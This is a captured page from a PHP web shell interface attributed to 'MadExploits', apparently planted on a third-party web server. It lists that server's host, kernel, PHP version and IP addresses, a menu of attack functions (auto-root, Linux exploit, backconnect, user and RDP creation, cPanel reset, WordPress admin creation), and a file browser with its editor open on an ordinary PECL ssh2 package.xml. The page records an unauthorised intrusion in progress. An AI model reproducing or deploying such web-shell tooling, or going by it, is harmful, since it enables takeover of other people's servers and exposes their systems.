Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.213
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
opt /
remi /
php56 /
lib /
php /
peclxml /
[ HOME SHELL ]
Name
Size
Permission
Action
php56-php-pecl-apcu.xml
11.88
KB
-rw-r--r--
php56-php-pecl-igbinary.xml
20.69
KB
-rw-r--r--
php56-php-pecl-imagick-im6.xml
43.25
KB
-rw-r--r--
php56-php-pecl-jsonc.xml
18.73
KB
-rw-r--r--
php56-php-pecl-memcache.xml
28
KB
-rw-r--r--
php56-php-pecl-memcached.xml
19.7
KB
-rw-r--r--
php56-php-pecl-msgpack.xml
23.2
KB
-rw-r--r--
php56-php-pecl-ssh2.xml
7.48
KB
-rw-r--r--
php56-php-pecl-zip.xml
47.41
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : php56-php-pecl-ssh2.xml
<?xml version="1.0" encoding="UTF-8"?> <package packagerversion="1.10.1" version="2.0" xmlns="http://pear.php.net/dtd/package-2.0" xmlns:tasks="http://pear.php.net/dtd/tasks-1.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://pear.php.net/dtd/tasks-1.0 http://pear.php.net/dtd/tasks-1.0.xsd http://pear.php.net/dtd/package-2.0 http://pear.php.net/dtd/package-2.0.xsd"> <name>ssh2</name> <channel>pecl.php.net</channel> <summary>Bindings for the libssh2 library</summary> <description>Provides bindings to the functions of libssh2 which implements the SSH2 protocol. libssh2 is available from http:/libssh2.org/</description> <lead> <name>Casper Langemeijer</name> <user>langemeijer</user> <email>langemeijer@php.net</email> <active>yes</active> </lead> <lead> <name>Pierre Joye</name> <user>pajoye</user> <email>pierre@php.net</email> <active>yes</active> </lead> <lead> <name>Mike Sullivan</name> <user>mikesul</user> <email>mikesul@php.net</email> <active>no</active> </lead> <lead> <name>Sara Golemon</name> <user>pollita</user> <email>pollita@php.net</email> <active>no</active> </lead> <date>2016-06-12</date> <time>14:17:40</time> <version> <release>0.13</release> <api>0.13</api> </version> <stability> <release>stable</release> <api>stable</api> </stability> <license uri="http://www.php.net/license">PHP License</license> <notes> - Fixed bug #63660 php_ssh2_fopen_wrapper_parse_path segfaults - Fixed bug #63855 compilation fails on windows (patch from Erez H) - Fixed bug #64535 php_ssh2_sftp_dirstream_read segfault on error (Matt Pelmear) - Add reflection API support (Frédéric Hardy) - Add exit-status support for ssh2 file wrappers (Vladimir Zidar) - Fixed bug #58893 Unable to request a channel from remote host (Vladimir Zidar) - Fix segfault when trying to authenticate in servers that do not support authentication (none) (Felipe Weckx) </notes> <contents> <dir name="/"> <file md5sum="5a88cf7afadb26af6bf7f988808b9c32" name="tests/ssh2_auth.phpt" role="src" /> <file md5sum="ef5750f6e38c7c150e2bd3a8e5bf7135" name="tests/ssh2_connect.phpt" role="src" /> <file md5sum="bd0423758201da47ad43681232490f4b" name="tests/ssh2_sftp_001.phpt" role="src" /> <file md5sum="eb92fa2502f2cea01dfdc9103d088e9e" name="tests/ssh2_sftp_002.phpt" role="src" /> <file md5sum="0ac14826a583b4149eed94e5b0850020" name="tests/ssh2_skip.inc" role="src" /> <file md5sum="186d539321ffa93c72f6a1d68c6ff045" name="tests/ssh2_test.inc" role="src" /> <file md5sum="fc1131b4ea5d8639bac2e0ff52b2777f" name="config.m4" role="src" /> <file md5sum="0fdcbe3c6c227b1989a0d6d2c63697ad" name="config.w32" role="src" /> <file md5sum="75a9d841d252ab7b962b6b977380711c" name="ssh2.c" role="src" /> <file md5sum="2871bc00d6cead14e8d9a0172e0c31d3" name="php_ssh2.h" role="src" /> <file md5sum="b1f54d42e3d32a0fdcbf3f9d1c6535fc" name="ssh2_fopen_wrappers.c" role="src" /> <file md5sum="7921e0abc6aeb166f1a419364a43bd05" name="ssh2_sftp.c" role="src" /> <file md5sum="ab5215b391feaa5fb1ecc15a4caa2b47" name="LICENSE" role="src" /> </dir> </contents> <dependencies> <required> <php> <min>4.0.0</min> <max>6.0.0</max> </php> <pearinstaller> <min>1.4.0</min> </pearinstaller> </required> </dependencies> <providesextension>ssh2</providesextension> <extsrcrelease> <configureoption default="autodetect" name="with-ssh2" prompt="libssh2 prefix?" /> </extsrcrelease> <changelog> <release> <date>2016-06-12</date> <version> <release>0.13</release> <api>0.13</api> </version> <notes> - Fixed bug #63660 php_ssh2_fopen_wrapper_parse_path segfaults - Fixed bug #63855 compilation fails on windows (patch from Erez H) - Fixed bug #64535 php_ssh2_sftp_dirstream_read segfault on error (Matt Pelmear) - Add reflection API support (Frédéric Hardy) - Add exit-status support for ssh2 file wrappers (Vladimir Zidar) - Fixed bug #58893 Unable to request a channel from remote host (Vladimir Zidar) - Fix segfault when trying to authenticate in servers that do not support authentication (none) (Felipe Weckx) </notes> </release> <release> <date>2012-10-15</date> <version> <release>0.12</release> <api>0.12</api> </version> <notes> - Bumped libssh2 version requirement to 1.2 (aug 2009) - Added ssh2_auth_agent() - SSH agent authentication support (with libssh >= 1.2.3) - Added ssh2_sftp_chmod() (fixed bug #59880) - Added support for stream_set_timeout() to channel streams (fixed bug #56377) (with libssh >= 1.2.9) - Added keyboard-interactive to ssh2_auth_password() (fixed bugs #61760 and #54916) - Add license file as requested in bug #59980 - Allow for tilde (~) in public and private keyfile paths - Be more verbose about any errors within ssh2_scp_send - Fixed bug #56425 - Problem with ssh2_scp_send - Fixed bug #59794 - ssh2.sftp protocol wrapper works incorrectly for paths which contain a '#' - Fixed bug #63192 - Check if connection is authenticated. - Fixed bug #58576 - Handle error values from reads and writes to a channel. </notes> </release> <release> <date>2011-09-22</date> <version> <release>0.11.3</release> <api>0.11.0</api> </version> <notes> - Fixed bug#24349 (ssh2_sftp_mkdir fails with trailing slash) - Fixed bug#22729 (using ssh2.sftp stream on 64bit vs. 32bit) - Fixed bug#22671 (trailing spaces trimmed from filenames) - Fixed bug#17142 (Missing EOF detection in ssh2.sftp:// streams) - Fixed bug#16944 (Segmentation fault SIGSEGV with protected variable with ssh2) </notes> </release> <release> <date>2009-11-28</date> <version> <release>0.11.1</release> <api>0.11.0</api> </version> <stability> <release>beta</release> <api>beta</api> </stability> <license uri="http://www.php.net/license">PHP License</license> <notes> - Fixed the extension version info . no other changes since 0.11.1 </notes> </release> <release> <date>2009-11-28</date> <version> <release>0.11.1</release> <api>0.11.0</api> </version> <stability> <release>beta</release> <api>beta</api> </stability> <license uri="http://www.php.net/license">PHP License</license> <notes> - Fixed bug #9500, SSH2 sockets not being closed properly because of close vs closesocket difference - Fixed Windows support - Support for latest libssh2 release - Fix build with PHP 5.3 - Fixed incorrect return values for rename/unlink/mkdir/rmdir with sftp functions/streams - Fixed various memory leaks and segfaults </notes> </release> <release> <date>2009-11-28</date> <version> <release>0.11.1-dev</release> <api>0.11.0</api> </version> <stability> <release>beta</release> <api>beta</api> </stability> <license uri="http://www.php.net/license">PHP License</license> <notes> - Support for latest libssh2 release - Fix build with PHP 5.3 - Fixed incorrect return values for rename/unlink/mkdir/rmdir with sftp functions/streams - Fixed various memory leaks and segfaults </notes> </release> <release> <date>2008-12-08</date> <version> <release>0.11.0</release> <api>0.11.0</api> </version> <stability> <release>beta</release> <api>beta</api> </stability> <license uri="http://www.php.net/license">PHP License</license> <notes> - Support for latest libssh2 release - Fix build with PHP 5.3 - Fixed incorrect return values for rename/unlink/mkdir/rmdir with sftp functions/streams - Fixed various memory leaks and segfaults </notes> </release> </changelog> </package>
Close